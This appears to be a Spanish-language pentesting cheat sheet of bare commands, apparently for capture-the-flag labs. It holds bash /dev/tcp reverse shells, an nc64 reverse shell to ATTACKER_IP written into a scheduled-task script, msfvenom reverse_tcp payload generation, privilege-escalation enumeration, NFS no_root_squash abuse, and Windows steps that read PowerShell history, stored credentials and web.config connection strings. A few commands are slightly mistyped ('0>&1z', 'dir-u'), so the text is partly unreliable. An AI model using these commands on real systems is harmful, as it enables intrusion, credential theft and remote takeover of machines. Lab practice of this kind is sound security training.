Crear servidor http
python3 -m http.server 9000
Upgrade Terminal
python3 -c "import pty;pty.spawn('/bin/bash')"
Reverse shell
exec("/bin/bash -c 'bash -i >& /dev/tcp/<IP>/<PUERTO> 0>&1'");
Reverse shell
/bin/bash -i >& /dev/tcp/<IP>/<PUERTO> 0>&1z
SUIDS
find / -type f -perm -04000 -ls 2>/dev/null
SUDOS
sudo -l
Capabilities
getcap -r / 2>/dev/null
Carpetas writable
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
/etc/exports, buscar opciones con "no_root_squash"
showmount -e <DIRECCION IP>
mount -o rw <DIRECCION IP>:/<OPCION A SELECCIONAR> <CARPETA EMPAREJADA, DEBE ESTAR VACIA>
Descargar archivo
wget http://<IP>:<Puerto>/<Ubicacion archivo>
RDP
xfreerdp /u:<USER> /p:<PASS> /cert:ignore /v:<IP> /size:1280x720 /tls-seclevel:0
Historial CMD
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Lista de credenciales en cmd
cmdkey /list
Intentar entrar con credencial guardada
runas /savecred /user:admin cmd.exe
Buscar conexiones en web.config
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
Reverse shell windows
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat
Crear payload
msfvenom -p <OS>/<Arquitectura>/<Terminal>/reverse_tcp lhost=<IP> lport=<PUERTO> -f <Tipo de archivo> -o <Nombre>
Enumerar usuarios SMB
smbclient -L \\<IP>
Conectarse a SMB
smbclient //<IP>/anonymous
Descargar archivo SMB
smbget -R smb://MACHINE_IP/anonymous
Escanear subdominios
gobuster dir-u http://MACHINE_IP:3333 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt